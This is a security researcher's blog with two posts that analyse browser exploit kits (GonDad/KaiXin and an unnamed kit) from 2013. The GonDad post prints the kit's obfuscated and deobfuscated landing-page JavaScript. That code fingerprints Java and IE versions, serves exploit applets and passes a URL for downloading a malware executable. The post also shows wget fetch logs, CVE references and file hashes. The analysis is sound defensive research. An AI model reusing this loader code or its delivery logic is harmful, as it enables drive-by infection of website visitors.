Wednesday, December 25, 2013

Merry Christmas! - GonDad style

Or analysis of the GonDad Exploit kit - AKA KaiXin exploit pack.

This time of year we normally want to hear the familiar HO HO HO from father Christmas, but some evil doers want it different and instead want to do harm and make money the wrong way during the Holiday season too.

This adwenture started with a Twitter post from @SetAbominae about an unknown EK, that proved to be not the case @node5 spotted that this was in fact GonDad. Having not looked at the details of this Kit before I decided to go ahead and look at the details. With a pcap from @SetAbominae at my disposal, and with a live redirector, I was able to look at the whole chain of the EK. Thanks to @SetAbominae for providing the info needed to start this sled ride!

So lets go ahead and take a look at how this exploit kit is built and is functioning.

First fetch the hacked site which redirects:

--2013-12-23 --  hxxp: //
Connecting to||:80... connected.
HTTP request sent, awaiting response... 302 Found
Location: /gate/gate_main.aspx?ReturnUrl=%2findex.aspx [following]
--2013-12-23 --  hxxp: //
Reusing existing connection to
HTTP request sent, awaiting response... 200 OK
Length: 10359 (10K) [text/html]
Saving to: `pane1'

     0K ..........                                            100% 16.7K=0.6s

2013-12-23 (16.7 KB/s) - `pane1' saved [10359/10359]

A 302 redirect to gate_main.aspx which has an iframe tag at the bottom. Which will lead us to the land of darknes instead of happy holidays whishes.

Lets jump on Father Christmas sled and cross our fingers that Rudolf will guide us in the right direction. Fetching the source of the iframe:

--2013-12-23--  hxxp: //
Connecting to connected.
HTTP request sent, awaiting response... 200 OK
Length: 1671 (1.6K) [text/html]
Saving to: `index.html'

     0K .                                                     100%  256M=0s

2013-12-23 (256 MB/s) - `index.html' saved [1671/1671]
index.html is the main landing pane of the GonDad exploit kit. It fetches 2 more jacascript files, swfobject.js and jpg.js and has obfuscated javascript in the middle and ends with another iframe insert to /log/. The swfobject.js and jpg.js are files for checking versions of SW on the client. The log iframe tag leads to another set of swfobject.js and jpg.js. Lets look at the most interesting parts:

Main part of the landing panes

<script type="text/javascript" src="swfobject.js"></script>^M
<script src=jpg.js></script>^M
<script type="text/javascript">^M
eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('k U=v.E.L();e(d.19.f("1a=")==-1&&U.f("1B"+"x")<=-1&&U.f("1C")==-1&&U.f("1D"+"1E")==-1){k 1F=1G.1H.1I();k P=1J 1K();P.1L(P.1M()+24*1b*1b*1);d.19="1a=1N;1O=/;P="+P.1P();1Q(M.1R){}d.Q("<1S>");k 1c=d.1d(\'D\');d.D.F(1c);k 3=1T.1U()+"";k V=3.1V(",");3=1e(V[O].1f(/\\.|\\1g/g,\'\'));1W(i=1;i<V.1X;i++){14=1e(V[i].1f(/\\.|\\1g/g,\'\'));e(3<14)3=14}e((3<=1h&&3>=N)||(3<=1i&&3>=R)||(3<=1j&&3>=15)){k 2=d.1d(\'1Y\');2.S="1";2.T="1";e((3<=1Z&&3>=R)||(3>=15&&3<=2O)){2.l="1k.m";2.K="21.n";2.4("22","o://p.q.r.s/t.u");d.D.F(2)}h e((3<=23&&3>=N)||(3<=25&&3>=R)||(3<=1j&&3>=15)){2.l="26.m";2.K="27.28.n";2.4("w","o://p.q.r.s/t.u");2.4("y","z");2.4("A","B");2.4("C","G");d.D.F(2)}h e((3<=29&&3>=N)||(3<=2a&&3>=R)){2.l="2b.m";2.K="2c.2d.n";2.4("w","o://p.q.r.s/t.u");2.4("y","z");2.4("A","B");2.4("C","G");d.D.F(2)}h e(3<=2e&&3>=N){k j=M.v.E.L();e(j.f(\'H 6\')>-1){d.Q("<I W=\'X:Y-Z-1O-11-12\' S=\'J\' T=\'J\'><9 a=w c= \'o://p.q.r.s/t.u\'><9 a=y c= \'z\'><9 a=A c= \'B\'><9 a=C c= \'G\'><9 a=13 c= \'1l.1m.n\'><9 a=l c= \'1n.m\'></I>")}h{2.l="1n.m";2.K="1l.1m.n";2.4("w","o://p.q.r.s/t.u");2.4("y","z");2.4("A","B");2.4("C","G");d.D.F(2)}}h e(3<=2f&&3>=N){k j=M.v.E.L();e(j.f(\'H 6\')>-1){d.Q("<I W=\'X:Y-Z-1O-11-12\' S=\'J\' T=\'J\'><9 a=w c= \'o://p.q.r.s/t.u\'><9 a=y c= \'z\'><9 a=A c= \'B\'><9 a=C c= \'G\'><9 a=13 c= \'1o.1p.n\'><9 a=l c= \'1q.m\'></I>")}h{2.l="1q.m";2.K="1o.1p.n";2.4("w","o://p.q.r.s/t.u");2.4("y","z");2.4("A","B");2.4("C","G");d.D.F(2)}}h e(3<=1h&&3>=N){k j=M.v.E.L();e(j.f(\'H 6\')>-1){d.Q("<I W=\'X:Y-Z-1O-11-12\' S=\'J\' T=\'J\'><9 a=w c= \'o://p.q.r.s/t.u\'><9 a=y c= \'z\'><9 a=A c= \'B\'><9 a=C c= \'G\'><9 a=13 c= \'1r.1s.n\'><9 a=l c= \'1t.m\'></I>")}h{2.l="1t.m";2.K="1r.1s.n";2.4("w","o://p.q.r.s/t.u");2.4("y","z");2.4("A","B");2.4("C","G");d.D.F(2)}}h e(3<=1i&&3>=R){k j=M.v.E.L();e(j.f(\'H 6\')>-1){d.Q("<I W=\'X:Y-Z-1O-11-12\' S=\'J\' T=\'J\'><9 a=w c= \'o://p.q.r.s/t.u\'><9 a=y c= \'z\'><9 a=A c= \'B\'><9 a=C c= \'1u\'><9 a=13 c= \'1v.b.n\'><9 a=l c= \'1w.m\'></I>")}h{2.l="1w.m";2.K="1v.b.n";2.4("w","o://p.q.r.s/t.u");2.4("y","z");2.4("A","B");2.4("C","1u");d.D.F(2)}}}h{k j=M.v.E.L();e((j.f(\'H 6\')>-1)||(j.f(\'H 7\')>-1)){d.16("<O 17=2g.18><\\/O>")}h e((j.f(\'H 8\')>-1)&&(v.E.f(\'1x 1y 5.1\')>-1)&&(v.1z.f(\'1A\')>-1)){d.16("<O 17=1k.18><\\/O>")}h e((j.f(\'H 8\')>-1)&&(v.E.f(\'1x 1y 6.1\')>-1)&&(v.1z.f(\'1A\')>-1)){d.16("<O 17=2h.18><\\/O>")}}}',62,142,'||gondad|gondadx|setAttribute|||||param|name||value|document|if|indexOf||else||uaxrAJ5|var|archive|jpg|class|http|94|1O2|63|121|csrsss|exe|navigator|xiaomaolv||bn|woyouyizhixiaomaolv|si|conglaiyebuqi|bs|body|userAgent|appendChild|748|msie|OBJECT|2OO|code|toLowerCase|window|17OOO|iframe|expires|write|16OOO|width|height|qYSUDor1|arrx|classid|clsid|8AD9C84O|O44E|11D1|B3E9|OO8O5F499D93|CODE|tmp|15OOO|writeln|src|html|cookie|Brbrw6|6O|gondady|createElement|parseInt|replace|_|17O1O|16O45|15O33|aTgTpPDO|cvx2O12xxxx|Gondvv|rsdMnM2|gonw2O125O76|Gondqq|IpWYVWg3|xml2O13O422|XML2O13O422|cFiF7|135169649O|mixalpha|fdFRO|Windows|NT|browserLanguage|en|linu|bot|spid|er|QXDYGYH4|deconcept|SWFObjectUtil|getPlayerVersion|new|Date|setTime|getTime|Yes|path|toGMTString|while|closed|br|deployJava|getJREs|split|for|length|applet|16O27|15O31|GonqabGonqabExp|dota|17OO2||16O3O|rnQXOV5|GonbadExx|Ohno|17OO3|16O32|JhEbxjO|gonp1723|Gondattack|17OO6|17OO7|cftMKbY4|aTgTpPD1'.split('|'),O,{}))^M
<iframe width="O" height="O" src="../log/" scrolling="no" frameborder="O"></iframe>^M
The obfuscation is not as hard as it look.  I like using node-js and with that just change eval with console.log and the wrapped javascript comes rigt out:

var qYSUDor1 = navigator.userAgent.toLowerCase();
if (document.cookie.indexOf("Brbrw6=") == -1 && qYSUDor1.indexOf("linu" + "x") <= -1 && qYSUDor1.indexOf("bot") == -1 && qYSUDor1.indexOf("spid" + "er") == -1) {
    var QXDYGYH4 = deconcept.SWFObjectUtil.getPlayerVersion();
    var expires = new Date();
    expires.setTime(expires.getTime() + 24 * 6O * 6O * 1);
    document.cookie = "Brbrw6=Yes;path=/;expires=" + expires.toGMTString();
    while (window.closed) {}
    var gondady = document.createElement('body');
    var gondadx = deployJava.getJREs() + "";
    var arrx = gondadx.split(",");
    gondadx = parseInt(arrx[O].replace(/\.|\_/g, ''));
    for (i = 1; i < arrx.length; i++) {
        tmp = parseInt(arrx[i].replace(/\.|\_/g, ''));
        if (gondadx < tmp) gondadx = tmp
    if ((gondadx <= 17O1O && gondadx >= 17OOO) || (gondadx <= 16O45 && gondadx >= 16OOO) || (gondadx <= 15O33 && gondadx >= 15OOO)) {
        var gondad = document.createElement('applet');
        gondad.width = "1";
        gondad.height = "1";
        if ((gondadx <= 16O27 && gondadx >= 16OOO) || (gondadx >= 15OOO && gondadx <= 15O31)) {
            gondad.archive = "aTgTpPDO.jpg";
            gondad.code = "GonqabGonqabExp.class";
            gondad.setAttribute("dota", "hxxp ://94.1O2.63.121/csrsss.exe");
        } else if ((gondadx <= 17OO2 && gondadx >= 17OOO) || (gondadx <= 16O3O && gondadx >= 16OOO) || (gondadx <= 15O33 && gondadx >= 15OOO)) {
            gondad.archive = "rnQXOV5.jpg";
            gondad.code = "GonbadExx.Ohno.class";
            gondad.setAttribute("xiaomaolv", "hxxp ://94.1O2.63.121/csrsss.exe");
            gondad.setAttribute("bn", "woyouyizhixiaomaolv");
            gondad.setAttribute("si", "conglaiyebuqi");
            gondad.setAttribute("bs", "748");
        } else if ((gondadx <= 17OO3 && gondadx >= 17OOO) || (gondadx <= 16O32 && gondadx >= 16OOO)) {
            gondad.archive = "JhEbxjO.jpg";
gondad.code = "gonp1723.Gondattack.class";
            gondad.setAttribute("xiaomaolv", "hxxp ://94.1O2.63.121/csrsss.exe");
            gondad.setAttribute("bn", "woyouyizhixiaomaolv");
            gondad.setAttribute("si", "conglaiyebuqi");
            gondad.setAttribute("bs", "748");
        } else if (gondadx <= 17OO6 && gondadx >= 17OOO) {
            var uaxrAJ5 = window.navigator.userAgent.toLowerCase();
            if (uaxrAJ5.indexOf('msie 6') > -1) {
                document.write("<OBJECT classid='clsid:8AD9C84O-O44E-11D1-B3E9-OO8O5F499D93' width='2OO' height='2OO'><param name=xiaomaolv value= 'hxxp ://94.1O2.63.121/csrsss.exe'><param name=bn value= 'woyouyizhixiaomaolv'><param name=si value= 'conglaiyebuqi'><param name=bs value= '748'><param name=CODE value= 'cvx2O12xxxx.Gondvv.class'><param name=archive value= 'rsdMnM2.jpg'></OBJECT>")
            } else {
                gondad.archive = "rsdMnM2.jpg";
                gondad.code = "cvx2O12xxxx.Gondvv.class";
                gondad.setAttribute("xiaomaolv", "hxxp ://94.1O2.63.121/csrsss.exe");
                gondad.setAttribute("bn", "woyouyizhixiaomaolv");
                gondad.setAttribute("si", "conglaiyebuqi");
                gondad.setAttribute("bs", "748");
        } else if (gondadx <= 17OO7 && gondadx >= 17OOO) {
            var uaxrAJ5 = window.navigator.userAgent.toLowerCase();
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                document.write("<OBJECT classid='clsid:8AD9C84O-O44E-11D1-B3E9-OO8O5F499D93' width='2OO' height='2OO'><param name=xiaomaolv value= 'hxxp ://94.1O2.63.121/csrsss.exe'><param name=bn value= 'woyouyizhixiaomaolv'><param name=si value= 'conglaiyebuqi'><param name=bs value= '748'><param name=CODE value= 'gonw2O125O76.Gondqq.class'><param name=archive value= 'IpWYVWg3.jpg'></OBJECT>")
            } else {
                gondad.archive = "IpWYVWg3.jpg";
                gondad.code = "gonw2O125O76.Gondqq.class";
                gondad.setAttribute("xiaomaolv", "hxxp ://94.1O2.63.121/csrsss.exe");
                gondad.setAttribute("bn", "woyouyizhixiaomaolv");
                gondad.setAttribute("si", "conglaiyebuqi");
                gondad.setAttribute("bs", "748");
        } else if (gondadx <= 17O1O && gondadx >= 17OOO) {
            var uaxrAJ5 = window.navigator.userAgent.toLowerCase();
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                document.write("<OBJECT classid='clsid:8AD9C84O-O44E-11D1-B3E9-OO8O5F499D93' width='2OO' height='2OO'><param name=xiaomaolv value= 'hxxp ://94.1O2.63.121/csrsss.exe'><param name=bn value= 'woyouyizhixiaomaolv'><param name=si value= 'conglaiyebuqi'><param name=bs value= '748'><param name=CODE value= 'xml2O13O422.XML2O13O422.class'><param name=archive value= 'cFiF7.jpg'></OBJECT>")
            } else {
                gondad.archive = "cFiF7.jpg";
                gondad.code = "xml2O13O422.XML2O13O422.class";
                gondad.setAttribute("xiaomaolv", "hxxp ://94.1O2.63.121/csrsss.exe");
                gondad.setAttribute("bn", "woyouyizhixiaomaolv");
                gondad.setAttribute("si", "conglaiyebuqi");
                gondad.setAttribute("bs", "748");
        } else if (gondadx <= 16O45 && gondadx >= 16OOO) {
            var uaxrAJ5 = window.navigator.userAgent.toLowerCase();
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                document.write("<OBJECT classid='clsid:8AD9C84O-O44E-11D1-B3E9-OO8O5F499D93' width='2OO' height='2OO'><param name=xiaomaolv value= 'hxxp ://94.1O2.63.121/csrsss.exe'><param name=bn value= 'woyouyizhixiaomaolv'><param name=si value= 'conglaiyebuqi'><param name=bs value= '135169649O'><param name=CODE value= 'mixalpha.b.class'><param name=archive value= 'fdFRO.jpg'></OBJECT>")
            } else {
                gondad.archive = "fdFRO.jpg";
                gondad.code = "mixalpha.b.class";
                gondad.setAttribute("xiaomaolv", "hxxp ://94.1O2.63.121/csrsss.exe");
                gondad.setAttribute("bn", "woyouyizhixiaomaolv");
                gondad.setAttribute("si", "conglaiyebuqi");
                gondad.setAttribute("bs", "135169649O");
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        var uaxrAJ5 = window.navigator.userAgent.toLowerCase();
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            document.writeln("<iframe src=cftMKbY4.html><\/iframe>")
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document.write("<OBJECT classid='clsid:8AD9C84O-O44E-11D1-B3E9-OO8O5F499D93' width='2OO' height='2OO'><param name=xiaomaolv value= 'hxxp ://94.1O2.63.121/csrsss.exe'><param name=bn value= 'woyouyizhixiaomaolv'><param name=si value= 'conglaiyebuqi'><param name=bs value= '135169649O'><param name=CODE value= 'mixalpha.b.class'><param name=archive value= 'fdFRO.jpg'></OBJECT>")
            } else {
                gondad.archive = "fdFRO.jpg";
                gondad.code = "mixalpha.b.class";
                gondad.setAttribute("xiaomaolv", "hxxp ://94.1O2.63.121/csrsss.exe");
                gondad.setAttribute("bn", "woyouyizhixiaomaolv");
                gondad.setAttribute("si", "conglaiyebuqi");
                gondad.setAttribute("bs", "135169649O");
    } else {
        var uaxrAJ5 = window.navigator.userAgent.toLowerCase();
        if ((uaxrAJ5.indexOf('msie 6') > -1) || (uaxrAJ5.indexOf('msie 7') > -1)) {
            document.writeln("<iframe src=cftMKbY4.html><\/iframe>")
        } else if ((uaxrAJ5.indexOf('msie 8') > -1) && (navigator.userAgent.indexOf('Windows NT 5.1') > -1) && (navigator.browserLanguage.indexOf('en') > -1)) {
            document.writeln("<iframe src=aTgTpPDO.html><\/iframe>")
        } else if ((uaxrAJ5.indexOf('msie 8') > -1) && (navigator.userAgent.indexOf('Windows NT 6.1') > -1) && (navigator.browserLanguage.indexOf('en') > -1)) {
            document.writeln("<iframe src=aTgTpPD1.html><\/iframe>")

A lot of interesting stuff in here as the javascript now reveils filenames to the exploit, and pretty much which exploits as well. Also in clear reading is the URL to the final pyload of the EK. Thanks Rudolf for guiding us to the right place to unwrap all packets.

Time to get the Java exploits - a lot of them:

--2013-12-23--  hxxp ://
Connecting to connected.
hxxp  request sent, awaiting response... 200 OK
Length: 4858 (4.7K) [image/jpeg]
Saving to: `IpWYVWg3.jpg'

     0K ....                                                  100% 7.88M=0.001s

2013-12-23 (7.88 MB/s) - `IpWYVWg3.jpg' saved [4858/4858]

--2013-12-24--  hxxp ://
Connecting to connected.
hxxp  request sent, awaiting response... 200 OK
Length: 7860 (7.7K) [image/jpeg]
Saving to: `JhEbxj0.jpg'

     0K .......                                               100% 5.31M=0.001s

2013-12-24 (5.31 MB/s) - `JhEbxj0.jpg' saved [7860/7860]

--2013-12-24--  hxxp ://
Connecting to connected.
hxxp  request sent, awaiting response... 200 OK
Length: 13231 (13K) [image/jpeg]
Saving to: `rnQXOV5.jpg'

     0K .......... ..                                         100%  327K=0.04s

2013-12-24 (327 KB/s) - `rnQXOV5.jpg' saved [13231/13231]

--2013-12-24--  hxxp ://
Connecting to connected.
hxxp  request sent, awaiting response... 200 OK
Length: 4214 (4.1K) [image/jpeg]
Saving to: `rsdMnM2.jpg'

     0K ....                                                  100% 4.06M=0.001s

2013-12-24 (4.06 MB/s) - `rsdMnM2.jpg' saved [4214/4214]

--2013-12-24--  hxxp ://
Connecting to connected.
hxxp  request sent, awaiting response... 200 OK
Length: 5296 (5.2K) [image/jpeg]
Saving to: `cFiF7.jpg'

     0K .....                                                 100% 2.86M=0.002s

2013-12-24 (2.86 MB/s) - `cFiF7.jpg' saved [5296/5296]

--2013-12-24--  hxxp ://
Connecting to connected.
hxxp  request sent, awaiting response... 200 OK
Length: 7882 (7.7K) [image/jpeg]
Saving to: `fdFR0.jpg'

     0K .......                                               100% 5.48M=0.001s

2013-12-24 (5.48 MB/s) - `fdFR0.jpg' saved [7882/7882]

The JAR files are all familiar used Java exploits from exploit Kits. Todo: analyze them in more detail.

As we saw in the index.html file there where three more iframe tags to new HTML files. Lets go ahead an get those as well:

--2013-12-24--  hxxp ://
Connecting to connected.
hxxp  request sent, awaiting response... 200 OK
Length: 2179 (2.1K) [text/html]
Saving to: `cftMKbY4.html'

     0K ..                                                    100%  381M=0s

2013-12-24 (381 MB/s) - `cftMKbY4.html' saved [2179/2179]

--2013-12-24--  hxxp ://
Connecting to connected.
hxxp  request sent, awaiting response... 200 OK
Length: 1909 (1.9K) [text/html]
Saving to: `aTgTpPD0.html'

     0K .                                                     100%  293M=0s

2013-12-24 (293 MB/s) - `aTgTpPD0.html' saved [1909/1909]

--2013-12-24--  hxxp ://
Connecting to connected.
hxxp  request sent, awaiting response... 200 OK
Length: 1914 (1.9K) [text/html]
Saving to: `aTgTpPD1.html'

     0K .                                                     100%  318M=0s

2013-12-24 (318 MB/s) - `aTgTpPD1.html' saved [1914/1914]
and the content is javascript code, where cftMKbY4.html have some minor obfuscaion. Same procedure there change eval to console.log if you are using node-js and a bright and shiny javascript appears :)

The aTgTpPD0.html and aTgTpPD1.html are cve-2013-3897 exploits. First time I have seen the new IE exploits implemented in an exploit kit.


Here is part of the code(straight from Metasploit it seem):

The cftMKbY4.html is a bit older an seem to be cve-2012-1889 MS XML Core services.

I had expected a flash exploit or two in there, but I could not see the exploit at this run through.

MD5 on the files(all should be on VT):

ed02d44e6f1ec3f8b70ae1ffbd29674b  cFiF7.jpg
d04fdd307428381cf19db7e4b884e19c  fdFR0.jpg
dacff0fe8816332c5103f2228e05248e  IpWYVWg3.jpg
5805eb872c43133576b8fa612ff5f63f  JhEbxj0.jpg
60e70c75e4b376b9fce939bd7c7726d1  rsdMnM2.jpg
5b4fb126598c90770a182bc95cda2af0  rnQXOV5.jpg
537ac8d0bd57a7599f91b1d504542d32  cftMKbY4.html
04a2bb69f2c7132c4235e6be7a06b358  aTgTpPD0.html
ef5300801c897ffcf087ed4d847b2a82  aTgTpPD1.html
537ac8d0bd57a7599f91b1d504542d32  cftMKbY4.html
cd261c252ef3fe180016243c5677d820  csrsss.exe

Happy hunting Gondad Exploit Kit, heading into the new year of 2014 :)

Good read on GonDad EK:
Kahu Security have made a good analysis of this exploit kit back in october 2012. Exploit are added after that as we have seen and a few other changes are also made. 

Tuesday, December 10, 2013

Unknown EK - Analysis

Last Friday, the 6th of December, I saw a tweet by @Set_Abominea about an unknown exploit kit:

I went away for the week-end and when I got back Sunday night I was curious to what this could end up being. Kindly as always @Set_Abominea shipped me a very nice pcap of what was seen over at his place and from there I wanted to go the usual way and try to pick this thing a part.

Luckily this kit was quite simple and it did not take much time to figure out what these bad guys where up to. No JavaScript obfuscation, no payload XOR or encryption.
Warning: the bad stuff is still alive so take precautions necessary if you engage it on your own.

To the task at hand. Lets start fetching bad stuff...

--2013-12-09 --  hxxp://
Connecting to||:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 47 [text/html]
Saving to: `vd2.html'

     0K                                                       100% 3.65M=0s

2013-12-09  (3.65 MB/s) - `vd2.html' saved [47/47]

So what did we get:

<script src=hxxp: //></script>

Not much: Go and fetch some JavaScript was all.

--2013-12-09 --  hxxp://
Connecting to connected.
HTTP request sent, awaiting response... 200 OK
Length: 269 [application/x-javascript]
Saving to: `2.js'

     0K                                                       100% 22.6M=0s

2013-12-09 (22.6 MB/s) - `2.js' saved [269/269]

which gave me:
if(document.cookie.indexOf('veatpr')==-1){var expires=new Date();expires.setTime(expires.getTime()+24*60*60*1000);document.cookie='veatpr=Yes;path=/;expires='+ex
pires.toGMTString();document.write("<iframe src=hxxp: // width=0 height=0></iframe>");}

So just some cookie stuff and then it writes an iframe tag. How convenient. Oh and of course with=0 and height=0. So we are not supposed to see it after all.
Time to fetch what we are not supposed to be looking at in that iframe:

--2013-12-09 --  hxxp: //
Connecting to connected.
HTTP request sent, awaiting response... 200 OK
Length: 279 [text/html]
Saving to: `2.html'

     0K                                                       100% 22.9M=0s

2013-12-09 (22.9 MB/s) - `2.html' saved [279/279]

    <applet archive="waRSJk.jar" code="PIVOEGh" width="0" height="0">
    <script language="javascript" src="hxxp: //" charset="gb2312"></script>

Right on with Java applet tags. So we are going to be sploited through Java then.

--2013-12-09 --  hxxp: //
Connecting to connected.
HTTP request sent, awaiting response... 200 OK
Length: 59768 (58K) [application/java-archive]
Saving to: `waRSJk.jar'

     0K .......... .......... .......... .......... .......... 85% 43.6K 0s
    50K ........                                              100% 2.33M=1.2s

2013-12-09 (50.7 KB/s) - `waRSJk.jar' saved [59768/59768]

The java archive:

As reported, it utilizing the vulnerability from CVE-2013-2465. Yes that is the 0-Day for Java 1.6.45 that will never get patched. A lot of EK using it so patch-patch-patch(If you have not already).

The JAR archive also had a couple of embedded files. One was a configuration file and the other an exe file.

Here is how the embedded file is written to disk.

The Java code also checks weather it is in WIN  or UX land

Reading the properties from the config file

And the file is executed as well

Even if this particular walk through of the kit did not download malware with the Java code. It seem like the code is capable of doing so. It also seem like that is configured through the embedded properties file, as we saw earlier that is probably decided with the property name URL.
In addition the pcap from @Set_Abominea contained download of an exe file

I fetched it manually as well, but could not find trace of that in the Java code. Could be fetched with the malware payload it self though. Strange user-agent at least.

MD5 and virustotal was covered in the paste linked in the tweet. I got exactly the same files 3 days later when I fetched them manually. So no need to repeat that here.

Happy EK hunting